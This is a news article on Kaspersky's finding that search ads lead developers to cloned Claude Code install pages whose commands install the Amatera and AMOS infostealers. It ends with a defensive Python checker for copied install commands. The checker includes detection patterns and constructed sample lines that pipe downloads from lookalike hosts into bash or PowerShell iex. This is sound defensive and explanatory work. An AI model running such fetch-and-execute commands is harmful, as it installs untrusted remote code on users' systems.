Kaspersky warns of AI tool malware campaign
By Staff Writer
Kaspersky Threat Research said it uncovered in March 2026 a new malware campaign targeting developers searching online for installation instructions for Claude Code, an AI development agent created by Anthropic.
According to the cybersecurity company, users who search for “Claude Code download” may encounter sponsored advertisements placed at the top of search results.
Kaspersky said one of those ads redirects users to a malicious webpage designed to closely imitate the official installation documentation for Claude Code.
The company said the scheme tricks users into installing malware that harvests sensitive information, including credentials, cryptocurrency wallet data, browser sessions and other confidential files.
Kaspersky said similar malicious campaigns also imitate other popular AI tools, including OpenClaw.

The fake documentation page is visually identical to the legitimate one and is hosted on Squarespace, a website-building and hosting platform, according to Kaspersky.
Because the fraudulent page precisely copies the original instructions, users may not immediately spot the deception when copying and executing installation commands, the company said.

Instead of installing the developer tool, Kaspersky said the commands deliver malware to the victim’s system.
On Windows systems, the malicious commands install Amatera, an information-stealing malware that collects data from user directories, web browsers and cryptocurrency wallets before transmitting the stolen information to a remote server, according to Kaspersky.
Kaspersky said Amatera has previously appeared in campaigns using the ClickFix distribution technique and is operated under a Malware-as-a-Service, or MaaS, model.
On macOS systems, the commands install AMOS, another infostealer that Kaspersky said has been documented in several malware campaigns targeting Apple devices.
Kaspersky researchers said they also found similar malicious campaigns aimed at other widely used AI tools, including OpenClaw and Doubao.
Using the same approach, attackers registered multiple domains and distributed files containing the Amatera infostealer while disguising them as legitimate downloads for those tools, Kaspersky said.
“The campaign poses significant risks because AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations. If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools,” comments Vladimir Gursky, cybersecurity expert at Kaspersky.
The warning highlights a growing risk around AI-assisted coding tools, which are increasingly used in software development workflows and can provide attackers with a direct path to corporate systems, source code and sensitive credentials if compromised.
Kaspersky linked the newly identified activity to a broader trend in which threat actors exploit users’ trust in search advertising, cloned websites and familiar brand interfaces to distribute malware.
The company said it had previously detected a related tactic in December 2025, when attackers used Google Ads to spread a macOS infostealer.
In that earlier case, Kaspersky said a specially generated chat interface made to resemble a ChatGPT tutorial pretended to guide users through installing the Atlas Browser.
The malicious instructions in that campaign appeared to be hosted on a legitimate site associated with OpenAI, Kaspersky said, helping attackers gain users’ trust.
To reduce the risk of infection, Kaspersky advised users to carefully verify download links and make sure they point to official project websites.
The company also urged developers to review any command-line instructions before executing them, especially if those commands are copied from external sources.
Kaspersky said users should avoid following guides they did not specifically request or do not fully understand.
The company added that reliable endpoint security solutions capable of detecting and blocking infostealers and malicious downloads remain an important layer of defense.
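The advice to verify download links and review copied commands before running them can be partly automated. The sketch below is an added example, not code from Kaspersky or from any of the tools named in the article; the allowlisted host, the function name and the sample commands are constructed placeholders to be replaced with the hosts the vendor actually documents.

```python
import re
from urllib.parse import urlsplit

# Assumption: placeholder allowlist. Replace with the hosts the vendor documents.
OFFICIAL_HOSTS = {"downloads.vendor.example"}

URL_RE = re.compile(r"""https?://[^\s'"|;)<>]+""", re.I)
# A download handed straight to an interpreter (sh/bash/zsh or PowerShell iex).
PIPE_RE = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b|\|\s*(iex|invoke-expression)\b", re.I)
# Encoded payloads that hide what will really run.
ENCODED_RE = re.compile(r"base64\s+(-d|--decode)|-enc(odedcommand)?\b|frombase64string", re.I)

def review_command(cmd, official_hosts=OFFICIAL_HOSTS):
    """Return a list of reasons to stop and read a copied install command."""
    findings = []
    for url in URL_RE.findall(cmd):
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
        except ValueError:
            findings.append(f"unparseable URL: {url}")
            continue
        if parts.scheme.lower() != "https":
            findings.append(f"non-HTTPS download: {url}")
        if "@" in parts.netloc:
            findings.append(f"userinfo in URL hides the real host: {url}")
        # Exact match only: a lookalike that merely contains the official
        # name as a prefix or subdomain label is still rejected.
        if host not in official_hosts:
            findings.append(f"host not on official allowlist: {host}")
    if PIPE_RE.search(cmd):
        findings.append("download is piped straight into an interpreter")
    if ENCODED_RE.search(cmd):
        findings.append("encoded payload; decode and read it before running")
    return findings

# Constructed sample commands, not taken from the campaign.
SAFE = "curl -fsSL https://downloads.vendor.example/install.sh -o install.sh"
LOOKALIKE = "curl -fsSL https://downloads.vendor.example.docs-site.example/install.sh | bash"
WINDOWS = 'powershell -c "irm http://cdn.lookalike.example/i.ps1 | iex"'
USERINFO = "curl https://downloads.vendor.example@host.example/x | sh"

if __name__ == "__main__":
    for sample in (SAFE, LOOKALIKE, WINDOWS, USERINFO):
        print(sample)
        for finding in review_command(sample) or ["no findings"]:
            print("   -", finding)
```

An empty result only means none of these patterns matched; the command and any script it downloads still need to be read before execution.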